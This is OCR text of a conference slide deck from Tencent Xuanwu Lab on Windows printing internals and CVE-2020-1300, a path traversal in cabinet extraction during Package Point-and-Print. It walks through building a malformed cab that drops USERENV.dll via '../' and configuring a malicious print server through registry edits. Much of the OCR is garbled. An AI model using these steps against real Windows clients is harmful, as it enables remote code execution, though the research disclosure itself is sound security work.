Evil Printer 


How to Hack Windows Machines with Printing Protocol 


Who are We? 


° Zhipeng Huo (@R3dF09) 
e Senior security researcher 
e Member of EcoSec Team at Tencent Security Xuanwu Lab 
e Windows and тасО5 platform security 
e Speaker of Black Hat Europe 2018 
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Who are We? 


e Chuanda Ding (@FlowerCode ) 
* Senior security researcher 
* Leads EcoSec Team at Tencent Security Xuanwu Lab 
* Windows platform security 


° Speaker of Black Hat Europe 2018, DEF CON China 2018, CanSecWest 
2017/2016 
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Agenda 


e Printing internals 
e Attack surfaces 
e CVE-2020-1300 


e Exploitation walk-through 
e Patch 


e Conclusion 


Evil Printer? 
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How does Network Printing Works 
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Rendering in Network Printing 


Client-side Rendering Server-side Rendering 
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What is Printer Driver? 


Interface component between OS and Printer 


e Rendering component 


e Convert application data into printer specified data 
e Configuration component 
e Enable user to configure printer 


“Іп order to support both client-side 
and server-side rendering, It is a 
requirement that printer drivers are 
available to print server and print 
client. 


Supporting Client-Side Rendering and Server-Side Rendering 


https://docs.microsoft.com/en-us/openspecs/windows protocols/ms- 
prsod/e47fedcc-d422-42a6-89fc-f04eb0c168e3 


How is Printer Drivers Distributed? 


Point-And-Print 


e Allows a print client to download printer driver directly 
from a print server 


Package Point-And-Print 


e Allows a print client to download a printer support 
package that includes the print driver 


“The package approach to driver installation 
provides improved security for point and print 
by checking driver signing during the 
establishment of a point and print connection.” 


Point and Print with Packages 


https://docs.microsoft.com/en-us/windows- 
hardware/drivers/print/point-and-print-with-packages 


Print Spooler Service 


e Manages printer drivers 7a 
: | Application | 


e Primary component of Windows Printing 

e Auto-start service, always running 

° Manage the printing process 

° Export printing APIs 

° Implements both Print Client and Server roles 
° Dangerous design 

° SYSTEM privilege level 

e Does networking 

e Dynamically loads third-party binaries 


° Retrieves correct printer driver 
e Loads the driver : 
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Printing API 


Why Target Windows Printing? 


° Much older than average Windows legacies 
° More than 25 years (!) 
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° One of the most important services 
° Highly integrated with OS 


° Very complex and confusing 


° Highest privilege level 


Local Attack Surfaces 


° Windows printing has many services and components work at highest 
privilege level 

° They export surfaces to lower privilege level even AppContainer 

e Abusing them could result in Local Privilege Escalation or Sandbox 
Escape 


Remote Attack Surfaces 


e Attack print server 
° Expose the System in the unsafe network 


° Attack print client 
° May be suffering from the unsafe print server (Evil Printer) 


What Happens Behind the 
Scene when Windows Connect 
to a Printer? 


Print Client Connects to Print Server 


PowerShell 


• Add-Printer -ConnectionName \\printServer\printerName 


Win32 Print Spooler API E вав Add Printer 


Find a printer by other options 
* AddPrinterConnection 
* AddPrinterConnection2 


O My printer is a little older. Help me find it. 
@ Select a shared printer by name 


—r [S —S 


Example: \\computername\printername or 
G U | — $$ 4 http://computername/printers/printername/.printer 


O Add a printer using a TCP/IP address or hostname 


O Add a Bluetooth, wireless or network discoverable printer 


e printui /im 


O Add a local printer or network printer with manual settings 


All Roads to 
winspool!AddPrinterConnection2 


BOOL AddPrinterConnection2( 
“In HWND hWnd, 
In  LPCTSTR pszName, 


DWORD dwLevel, 
An. PVOID POE исе 


) ; 


pszName [in] 
A pointer to a mull-terminated string that specifies the name of a 
printer to which the current user wishes to establish a connection. 


Warning Dialog after AqdPrinterConnection2 


Windows needs to download and install a software driver 
from the V 192.168.234.133 computer to print to test. 
Proceed only if you trust the V 192.168.234.133 computer 
and the network. 


[] Don't show this again 9 Install driver 


Purpose of Warning Dialog 


e What If the Printer Driver is Malicious? 
e CVE-2016-3238 
* Windows Print Spooler Remote Code Execution 


* Aremote code execution vulnerability exists when the Windows Print Spooler 
service does not properly validate print drivers while installing a printer from 
servers. 


° “The update addresses the vulnerability by issuing a warning to users 


who attempt to install untrusted printer drivers" 


AddPrinterConnection2 Internals 
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AddPrinterConnection2 Internals 


° ERROR PRINTER DRIVER DOWNLOAD NEEDED 
* 0x00000BB9 


*winspool!DownloadAndInstallLegacyDriver 


* ntprint!PSetupDownloadAndInstallLegacyDriver 
e ntprint!DisplayWarningForDownloadDriver 
* ntprint!DownloadAndInstallLegacyDriver 


Point-and-Print or Package Point-And-Print? 


= Add Printer 


You've successfully added CutePDF Writer on 192.168.234.135 


Printer name: "utePDF Writer on 192.168.234.135 


This printer has been installed with the CutePDF Writer v4.0 driver. 


€ 


Printers & scanners 
H CutePDF Writer on 192.168.234.135 


Open queue Manage 


Remove device 


Capture the Driver Download 


:5... @mkspoolsv exe 
:5... fin tspoolsv ехе 
5... spoolsv.exe 


spoolsv.exe 
I exe 
Espoolsv.exe 
rspoolsv exe 
spoolsv.exe 
spoolsv.exe 
Espoolsv.exe 
spoolsv.exe 


.. spoolsv.exe 
... fiiitspoolsv.exe 
... fI spoolsv.exe 
... spoolsv.exe 
... spoolsv.exe 
" det spoolsv exe 

= sapu exe 


. i spoolsv. exe 


mi spoolsv exe 
spoolsv.exe 
spoolsv.exe 
m= spoolsv.exe 

Espoolsv.exe 
i spoolsv ехе 


š spoolsv.exe 


spoolsv.exe 
“ерооіву ехе 
mspoolsv ехе 


2116 BÀ WriteFile 
2116 EA ReadFile 
2116 EA CreateFile 


2116 BA SetPipelnformat... 


2116 EAWrteFile 

2116 Ek ReadFile 

2116 Ek ReadFile 

2116 B CreateFile 
2116 B CreateFile 
2116 Eh CreateFile 
2116 BA CreateFile 
2116 BA CreateFile 
2116 EA CreateFile 
2116 EA CreateFile 
2116 EA WrteFile 

2116 EA CreateFile 
2116 B CreateFile 
2116 — 


2116 552. 
2116 BA CreateFile 
2116 BA CreateFile 
2116 BA CreateFile 
2116 EA CreateFile 
2116 EA WrteFile 
2116 EA WrteFile 
2116 BCreateFile 
2116 EA CreateFile 
2116 EkCreateFile 
2116 BACreateFile 
2116 EkCreateFile 
2116 BACreateFile 
2116 EA CreateFile 


SUCCESS \\192.168.234.133\pipe\spoolss Offset: 0, Length: 1.. 
SUCCESS \\192.168.234.133\pipe\spoolss Offset: 0, Length: 1. 
\\192.168.234.133\pipe\spoolss Desired Access: G.. 
\\192.168.234.133\pipe\spoolss 
SUCCESS \\192.168.234.133\pipe\spoolss Offset: 0, Length: 1.. 
SUCCESS \\192.168.234.133\pipe\spoolss Offset: 0, Length: 1.. 
SUCCESS \\192.168.234.133\pipe\spoolss Offset: 0, Length: 1.. 
SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PSCRIPT5.DLL Desired Access: G.. 
SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PS5UI.DLL Desired Access: G... 
SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\CUTEPDFW.PPD Desired Access: G... 
SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PSCRIPT.HLP Desired Access: G 
SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PSCRIPT.NTF Desired Access: G 
SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PSCRIPT5.DLL Desired Access: R 
SUCCESS C:\Users\R3DFO09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PSCRIPT5.DLL Desired Access: G. 
SUCCESS C:\Users\R3DFO9\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PSCRIPT5.DLL Offset: 0, Length: 6. 


PATH NOT FOUND C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\en-US\PSCRIPT5...Desired Access: G... 
PATH NOT FOUND C:\Users\R3DFO09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80}\en\PSCRIPTS.DL... Desired Access: G... 
ки С: \Users \R3DF09\App Data Local Temp \{2D28DDBAC51 5-4FAB- ABC8-E5CE2A393E80)\PSCRIPTS.DLL i 
SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PSCRIPT5.DLL Desired Access: R 
SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C51 5-4FAB-ABC8-E5CE2A393E80)\PSCRIPTS.DLL i E 
PATH NOT FOUND C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\en-US\PSCRIPT5...Desired Access: С... 
PATH NOT FOUND C:\Users\R3DFO09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\en\PSCRIPTS.DL... Desired Access: G... 


SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PSCRIPTS.DLL Desired Access: R.. 
SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PS5UI._DLL Desired Access: R.. 
SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PS5UI.DLL Desired Access: G.. 
SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PS5UI.DLL Offset: 0, Length: 1. 
SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PS5UI.DLL Offset: 1,048,576, . 


PATH NOT FOUND C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\en-US\PS5UI.DL... Desired Access: G... 
PATH NOT FOUND C:\Users\R3DF09\App Data Local Temp WM2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80 Men PSSUJI.DLL mui Desired Access: G... 


SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PS5UI.DLL Desired Access: R 
SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PS5UI.DLL Desired Access: R 
SUCCESS C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PS5UI.DLL Desired Access: G. 


PATH NOT FOUND C:\Users\R3DFO09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\en-US\PS5UI.DL... Desired Access: G. | 
PATH NOT FOUND C:\Users\R3DF09\App Data \Local\ Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\en\PS5UI.DLL.mui Desired Access: G... 


Capture the Driver Install 


3:24:5... a spoolsv exe 2116 EX CreateFile SUCCESS C:\Windows \System32\spool drivers \x64\3\New \CUTEPDFW.PPD Desired Access: Generic Write, Read Attributes, Disposition: Overwritelf, Options: Sequential ... 
3:24:5... а spoolsv exe 2116 Ek ReadFile SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393ES0)\CUTEPDFW.PPD Offset: 0, Length: 4,096, Priority: Normal 

3:24:5... @mspoolsv ехе 2116 EA WrteFile SUCCESS CWindowsSystem32'spool drivers ix6413 New CUTEPDFW.PPD Offset: 0, Length: 4,096, Priority: Normal 

3:24:5... gii spoolsv exe 2116 Eh ReadFile SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\CUTEPDFW.PPD Offset: 4,096, Length: 4,096 

3:24:5... @mspoolsv exe 2116 EB, WrteFile SUCCESS C:\Windows \System32\spool\drivers\x64\3\New NCUTEPDFW.PPD Offset: 4,096, Length: 4,096, Priority: Normal 

3:24:5... spoolsv.exe 2116 Ek ReadFile SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\CUTEPDFW.PPD Offset: 8,192, Length: 4,096 

3:24:5... @mspoolsv.exe 2116 EA WiteFile SUCCESS C:\Windows \System32\spool \drivers x6413NNew NCUTEPDFW.PPD Offset: 8,192, Length: 4,096 

3:24:5... gi spoolsv exe 2116 Eh ReadFile SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\CUTEPDFW.PPD Offset: 12,288, Length: 4,096 

3:24:5... @mspoolsv ехе 2116 Eh WrteFile SUCCESS C:\Windows \System32\spool \drivers\x64\3\New CUTEPDFW.PPD Offset: 12,288, Length: 4,096 

3:24:5... spoolsv.exe 2116 Ek ReadFile SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\CUTEPDFW.PPD Offset: 16,384, Length: 4,096 

3:24:5... пак spoolsv.exe 2116 Eh WrteFile SUCCESS C:\Windows \System32\spool drivers \x64\3\New CUTEPDFW.PPD Offset: 16,384, Length: 4,096, Priority: Normal 

3:24:5... gi] spoolsv exe 2116 Ek ReadFile SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\CUTEPDFW.PPD Offset: 20,480, Length: 4,096 

3:24:5... пак spoolsv.exe 2116 EA WrteFile SUCCESS C:\Windows \System32\spool drivers \x64\3\New \CUTEPDFW.PPD Offset: 20,480, Length: 4,096, Priority: Normal 

3:24:5... (ЕЕзроо\зу ехе 2116 Eh ReadFile SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\CUTEPDFW.PPD Offset: 24,576, Length: 4,096 

3:24:5... gi ispoolsv.exe 2116 BA WrteFile SUCCESS C:\Windows \System32\spool drivers \x64\3\New NCUTEPDFW.PPD Offset: 24,576, Length: 4,096 

3:24:5... spoolsv.exe 2116 Ek ReadFile SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\CUTEPDFW.PPD Offset: 28,672, Length: 3,064 

3:24:5... @mspoolsv.exe 2116 EA WrteFile SUCCESS C:\Windows \System32\spool \drivers\x64\3\New \CUTEPDFW.PPD Offset: 28,672, Length: 3,064 

3:24:5... di spoolsv.exe 2116 Eh ReadFile END OF FILE C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\CUTEPDFW.PPD Offset: 31,736, Length: 4,096 

3:24:5... fmespoolsv.exe 2116 БА SetBasiclnforn... SUCCESS C:\Windows \System32\spool drivers \x64\3\New CUTEPDFW.PPD Creation Time: 7/15/2020 8:52:53 PM, LastAccess Time: 7/15/2020 8:52:54 PM, LastWrite Ti... 
3:24:5... spoolsv.exe 2116 EX CreateFile SUCCESS C:\Windows \System32\spool \drivers\x64\3\New CUTEPDFW.PPD Desired Access: Read Attributes, Delete, Synchronize, Disposition: Open, Options: Synchrono... 
3:24:5... spoolsv.exe 2116 BA QueryAttributeT... SUCCESS C:\Windows \System32\spool drivers \x64\3\New \CUTEPDFW.PPD Attributes: A, Reparse Tag: 0x0 

3:24:5... юш<рооізу ехе 2116 EACreateFile SUCCESS C:\Windows \System32\spool drivers \x64\3 Desired Access: Write Data/Add File, Synchronize, Disposition: Open, Options: , Attributes: n/... 
3:24:5... š 2116 SetRenamelnfo ( C:\Windows System 32^spool drivers \x64\3\New CUTEPDFW.PPD ReplacelfExists: True, FileName: C:\Windows\System32\spool\drivers \x64\3\CUTEPDFW.P 
3:24:5... spoolsv.exe 2116 EACreateFile SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80} Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory... 
3:24:5... dii spoolsv ехе 2116 Ek QueryDirectory SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PSCRIPT.HLP Filter: PSCRIPT.HLP, 1: PSCRIPT.HLP 

3:24:5... spoolsv.exe 2116 EX CreateFile SUCCESS C:\Windows \System32\spool drivers 643 Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory... 
3:24:5... fimespoolsv.exe 2116 Eh QueryDirectory SUCCESS Ci Windows Svstem32spool drivers x64N3XP SCRIPT.HLP Filter: PSCRIPT.HLP, 1: PSCRIPT.HLP 

3:24:5... gam зрооізу ехе 2116 EA CreateFile SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80} Desired Access: Read Data/List Directory, Synchronize, Disposition: Open, Options: Directory... 


3:245... spoolsv.exe 2116 BA QueryDirectory SUCCESS C:\Users\R3DF09\App Data Local Temp \{2D28DDBA-C515-4FAB-ABC8-E5CE2A393E80)\PSCRIPT.NTF Filter: PSCRIPT.NTF, 1: PSCRIPT.NTF 


Its Point-And-Print! 


How to enable Package Point-And-Print mechanism? 


spoolsv!RpcAddPrinterConnection2 


spoolsv!RpcAddPrinterConnection2 
win32spl!TPrintOpen: :CreateLocalPrinter 
win32spllTPrintOpen: :AcquireV3DriverAndAddPrinter 


win32spl'!TDriverInstall::DeterminateInstallType 


win32spl!TDriverInstall::CheckPackagePointAndPrint 


win32spl!TDriverlnstall::Check 
PackagePointAndPrint 


1f (v5 >= O) ( e 
VLA = FTI; 


if (*( BYTE *) (v14 + OxA8) & 1) Í 


v5 = TDriverlnstall::DownloadAndImportDriverPackages (v2, 
(struct _DRIVER INFO 8W *)v14); 


} 
} 


Get Object 


Print Client Print Server 


RPC 
Get Object 


DRIVER INFO 8WStructure 


+0x000 cVersion Uint4B 

+0x008 pName Ptr64 Wchar 
+0x010 pEnvironment Ptr64 Wchar 
+0x018 pDriverPath Ptr64 Wchar 
+0x020 pDataFile Ptr64 Wchar 
+0x028 pConfigFile Ptro4 Wchar 
+0x030 pHelpFile Ptro4 Wchar 
+0x038 pDependentFiles Ptr64 Wchar 
+0x040 pMonitorName Ptr64 Wchar 
+0x048 pDefaultDataType Ptr64 Wchar 
+0x050 pszzPreviousNames Ptr64 Wchar 
+0x058 ftDriverDate FILETIME 

+0x060 dwlDriverVersion Uint8B 

+0x068 pszMfgName Ptr64 Wchar 
+0x070 pszOEMUrl Ptr64 Wchar 
+0x078 pszHardwareID Ptr64 Wchar 
+0x080 pszProvider : Ptr64 Wchar 
+0x088 pszPrintProcessor Ptr64 Wchar 
+0x090 pszVendorSetup Ptr64 Wchar 
*0x098 Dee P ODDS. Ptr64 Wchar 
+0x0a0 pszInfPath Ptr64 Wchar 
+0x0a8 a tk : Uint4B 
+0x0b0 pszzCoreDriverDependencies Ptr64 Wchar 
+0x0b8 ftMinInboxDriverVerDate FILETIME 
+0x0c0 dwlMinInboxDriverVerVersion Uint8B 


PrinterDriverAttributes 


#define PRINTER DRIVER PACKAGE AWARE 0x00000001 


define 
define 
define 
define 
define 
define 
define 
define 
define 
define 
define 
define 
define 


PRINTER DRIVER XPS 0х00000002 

PRINTER DRIVER SANDBOX ENABLED 0x00000004 
PRINTER DRIVER CLASS 0x00000008 

PRINTER DRIVER DERIVED 0x00000010 
PRINTER DRIVER NOT SHAREABLE 0x00000020 
PRINTER DRIVER CATEGORY FAX 0x00000040 
PRINTER DRIVER CATEGORY FILE 0x00000080 
PRINTER DRIVER CATEGORY VIRTUAL 0x00000100 
PRINTER DRIVER CATEGORY SERVICE 0x00000200 
PRINTER DRIVER SOFT RESET REQUIRED 0x00000400 
PRINTER DRIVER SANDBOX DISABLED 0x00000800 
PRINTER DRIVER CATEGORY 3D 0x00001000 
PRINTER DRIVER CATEGORY CLOUD 0x00002000 


Driver Package 


° A collection of the files needed to successful load a driver 
° device information file (.inf) 
° catalog file 
° allthe files copied by .inf file 


x64 PCC prnms001.inf amd64 BSedBca94fd954adb.cab 
— Уты. 
MXDW gpd кииүү" — m" чам - 
e MXDW-pipelineconfig.xml prnms001.cat prnms001.Inf 
M umet еси ata at ni a 


l 


prnms001.PNF 


Where to Get PCC (Package Cabinet) 


РС > LocalDisk(C:) > Windows > System32 > spool > drivers > x64 > PCC > v O Search PCC 
Name | Date modified Type Size 
E ntprint.inf amd64 07e03d34435d8940.cab 7/16/2020 11:35 AM Cabinet File 3,829 KB 
€ prnms001.inf amd64 8ed8ca94fd954adb.cab 7/16/2020 11:35 AM Cabinet File 11 KB 
Е prnms002.inf amd64 7195f31f5acda8f4.cab 7/16/2020 11:35 AM Cabinet File 2,310 KB 
E prnms003.inf amd64 85c8869cca48951c.cab 7/16/2020 11:35 AM Cabinet File 1,302 KB 
B prnms009.inf amd64 0ab2e212e0139e8c.cab 7/16/2020 11:35 AM Cabinet File 11 KB 


InfPath: 
C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_85c8869cca48951c\prnms003. inf 


PackagePath: 
C:\Windows\System32\spool\drivers\x64\PCC\prnms003.inf_amd64_85c8869cca48951c.cab 


DownloadAndlImportDriverPackages 


e TDriverInstall::DownloadAndImportDriverPackages 


e TDriverinstall: :DownloadAndExtractDriverPackageCab 
e TDriverinstall::InternalCopvFile 
e NCabbingLibrary::LegacyCabUnpack 


Cabinet File 


e Archive-file format for Microsoft Windows 


e A file that has the suffix .cab and that acts as a container for other 
files 


e |t serves as a compressed archive for a group of files 


File Decompression Interface APIs 


e Cabinet!FDICreate 
e Creates an FDI context 

° Cabinet ! FDICopy 
° Extracts files from cabinet 

e Cabinet!FDIDestroy 
e Deletes an open FDI context 


FDICopy 


BOOL DIAMONDAPI FDICopy( 
HFDI hfdi, 
LPSTR pszCabinet, 
LPSTR pszCabPach, 
ING Laos; 


PFNFDINOTIFY pfnfdin, 
PFNFDIDECRYPT pfnfdid, 
void *pvUser 


pfnfdin 

Pointer to an application-defined callback notification function 
to update the application on the status of the decoder. The 
function should be declared using the FNFDINOTIFY macro. 


win32spl!NCabbingLibrary::LegacyCabUnpack 


EDICODY (viz; 
pszCabinet, 
pszCabPath, 
0, 


(PFNFDINOTIFY)NCabbingLibrary::FdiCabNotify, 


Uca, 
&pvUser); 


NCabbingLibrary::FdiCabNotify 


* fdintCOPY FILE Information identifying the file to be copied 


LE (715 2D y. ú 
vl7 = *( QWORD *)v3; 
v21 = -1164; 
v15 = NCabbingLibrary::ProcessCopyFile( 
(NCabbingLibrary *)Block, 
^u REST unsigaed 11210 **) (ULA T O): 


(Const unsigned. тието "устају, 
716); 

operator delete (Block); 

v4 = v21; 


NCabbingLibrary::ProcessCopyFile 


e NCabbingLibrary::CreateFullPath 
* Check uM eschr (v10, '\\') 


1 > 77 check for sal 
' > 
e But forget ‘./’ ? А 


° wopen 


° О BINARY| О CREAT| O TRUNC| О RDWR 


14 = *v11 - asc 1800B3FF0[0]; 
if ( !v14 ) 


v8 = NCabbingLibrarv: :CreateFullPath( (NCabbingLibrarv $ 
)FileName, (const unsigned _ intl6 *)v9); 
if ( v8 >= 0 ) 


{ 


!CreateDirectoryW(v8, 0164) 


&& GetLastl 


vi = 
x180i64); 


*( QWORD *)a3 


(NCoreLiIbrary::Totring *) wopeni(vilo, 


0x8302, 0 


Make Malformed Cab 


*makecab 112112DiagSvcs2USERENV.dll test.cab 


Hz 
File Edit View Favorites Tools Help 


dp ш y аф m X i 


Add Extract Test Copy Move 


7-Zip xL 
($ (B Catestitest.cabl , 
Name (3 Error Renaming File or Folder Attributes Method 
[B] 112112DiagSves2USERENV.dll er rhea и А MSZip 
Read-only 


< > 


1/1 object(s) selected 0 0 2017-03-02 15:11:08 


| test.cab 


Offset (h) 


00000000 
00000010 
00000020 
00000030 
00000040 
00000050 
00000060 
00000070 
00000080 
00000090 
000000A0 
000000B0 
000000C0 
000000D0 
000000Е0 
000000Е0 
00000100 
00000110 
00000120 
00000130 


HexEdit Сар file 


03 
46 
00 
00 
00 
69 
64 
79 
40 
95 
AF 
50 
5A 
Е7 
FL 
E7 
CD 
F9 
DB 
В9 
35 


05 
00 
00 
00 
00 


93 


Бене 


00 
00 


00 


XT RAR 

AA. AA 
aaa M o war en RN Таз 
ANGLE ылау .../. 
. /DiagSvcs/USERE 


NV.dl1.b¿.é.1.€C 
KÕy | "UÖBPHIÚt.O 
..Е8.ЧвӨК%с.; 8% 
7.H*ETT.d. -J.PAm 
М+М QEqEk >. ft 60g 
бо.Рси. 4Р-В“Е.ӛі 
Ё5+7@КЁб|Ї9-13°@ 
%¿Bcúlx*.ési=-2»Y 
(q(5Y*BOR' deY=JÓ 
jIlüg"bcy, :1831m. 
éýôÍÄWëu>+0[° ° ÜV 
qëbüc їмхбсЇйї»Во 
GÍNOcÀ)4 -00s:0i 
Mys—*1.9.Z028Y6 
Ú»EFSñ_¿Kyzó2) Bi 


Malformed Cabinet 


C:\test\test.cab\..\..\DiagSvcs\ - О x 
File Edit View Favorites Tools Help 


dh = mm X i 


Add Extract Test Copy Move Delete Info 


@ || | CAtest\test.cab\..\..\DiagSves\ Info “ 
Мате Size Modified Attributes Method 
|S)USERENV. dl | 91648 2017-03-02 15:11 А Мр 
< > 


0/1 object(s) selected 


Prepare Print Server 


e Install Virtual Printer 
e CutePDF Writer 


° Share the printer prp 


Printers & scanners 


en CutePDF Writer 
Open queue Manage Remove device 
tn ^ 
Microsoft Print to PDF 
4 
Microsoft XPS Document Writer 
1 


SHA1 of CuteWriter: fdf1f3f2a483d62b15c6bf84095fe3ae2ef8e4c38 


Default PrinterDriverAttributes of 
CutePDF Writer 


Computer\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64 Drivers Version-31CutePDF Writer v4.0 


a NetworkProvider Type Data 
[] NetworkSetup2 tf REG SZ (value not set) 
- —— ab) App Registration REG_MULTI_SZ 
fo) Attributes REG_DWORD 0х00000002 (2) 
LI a ab) Base Driver REG SZ 
- ы с=з ab|ColorProfiles REG_MULTI_SZ 
m OSExtensionDatabase аһ Configuration File REG_SZ PSSUI.DLL 
|| PnP ab CoreDependencies REG MULTI SZ 
| > B Power ab] Data File REG_SZ CUTEPDFW.PPD 
~ | | Print = Datatype REG_SZ RAW 
v g Environments ab) Dependent Files REG_MULTI_SZ PSCRIPT.NTF 
П Windows 4.0 ab) Driver REG_SZ PSCRIPTS.DLL 
| | Windows ARM64 ab) DriverDate REG_SZ 01/01/1601 
П Windows ІА64 ab) DriverVersion REG_SZ 0.0.0.0 
| | Windows NT x86 ab] HardwarelD REG SZ 
“В Шы х64 ab) Help File REG_SZ PSCRIPT.HLP 
v | Drivers ab) InfPath REG SZ 
v | | Version-3 fiż) LastServicedBuild REG DWORD 0x00004cb8 (19640) 
Li CutePDF Writer v4.0 ab Manufacturer REG SZ 
| | Microsoft enhanced _ | ab) MininboxDriververDate REG SZ 01/01/1601 
— Shared Ға» (a8) MininboxDriverVerVersion REG_SZ 0.0.0.0 
[d Print Processors er Mens REG. SZ 
a Fons = OEM URL REG_SZ 
П Montos ek Previous Names REG MULTI SZ 
П PendingUpgrades abl Print Processor REG_SZ 
m Printers PrinterDriverAttributes REG_DWORD 0x00000000 (0) 
Ц Providers Cd PrinterDriveriD Es 
| | PriorityControl ab|Provider REG SZ 
ProductOptions ој TempDir REG DWORD 0x00000000 (0) 
ü RadioManagement ab|VendorSetup REG_SZ 
П Remote Assistance fiż) Version REG DWORD 0x00000003 (3) 
| | RetailDemo 
accen 


Make an Evil Printer 


HKEY LOCAL MACHINENSYSTEMNControlSet001NControlNPrintNEnvironmentsNWindows 


x64\Drivers\Version-3\CutePDF Writer v4.0 


*PrinterDriverAttributes = 1 
eInfPath = "c:NtestNtest.inf" 


Create a file С: \ \test.inf 


. cab at C: \Windows\System32\spool\drivers\x64\PCC 


Make an Evil Printer 


ppum rk. KULA мыл газа Тос, ОДИ OE OT LITE FG DITE CL MINTS TOO GATA NANG АЛДА 


his PC + Local Disk (С) > Windows > System32 > spool » drivers » x64 » PCC 


^ 


Narne 


И ntprini inf amb, 0760343443 348940. ab 


И prrims001.inf, тый, Bed 4944954 өдьс аһ, 
И рттз002 int, amd, 7195/3 5acdaBf4.cab 
q prnms003.inf amdéó4 85c8869ccs48951 c.cab 
B prnms009.inf. amdbA 0b2e212€0139e8c. cab 
a test.cab 


Date modified 


7/16/2020 11:35 AM 
/16/2020 11:35 AM 
7/16/2020 11:35 AM 
7/16/2020 11:35 AM 
7/16/2020 11:35 AM 
7/22/2020 2:23 PM 


Print Client Connects to Evil Printer 


2 a spoolsv exe 
2... spoolsv.exe 
2... spoolsv.exe 


2... spoolsv.exe 
2... Bi spoolsv ехе 


fam spoolsv.exe 


(шезросізу ехе 


2... Bi 'spoolsv ехе 
:2... (im spoolsv ехе 
ау ДЙ spoolsv.exe 
2... spoolsv.exe 
:2... @mspoolsv ехе 
= MA aui spoolsv.exe 
2 de spoolsv exe 


dai spoolsv exe 


: E spoolsv.exe 
2... spoolsv.exe 


fist spoolsv exe 


~ 3» aui spoolsv.exe 
:2... spoolsv.exe 


3712 BCreateFile 
3712 BA CreateFile 
3712 — 


CAWindowsNCSCw2.0.6 namespace 192.168.234.135 
C:\Windows\CSC\w2.0.6\namespace\\192.168.234.135 
C:\Windows\CSC\w2.0. S namespace 192. 168.234.135 


3712 [BA CreateFile 
3712 EA CreateFile 
3712 EA CreateFile 
3712 BA CloseFile 
3712 B CreateFile 
3712 B WriteFile 
3712 B WriteFile 
3712 Ek WriteFile 
3712 Әку/йегіе 
3712 Ek WiteFile 
3712 EA WrteFile 
3712 BA CloseFile 
3712 BA CreateFile 
GA 


3712 BA WrteFile 
3712 EA WrteFile 
3712 EA CloseFile 
3712 EA CreateFile 


3712 EA SetBasicinfom... 


3712 B CloseFile 
3712 BA CreateFile 


3712 БА SetBasicinfom... 


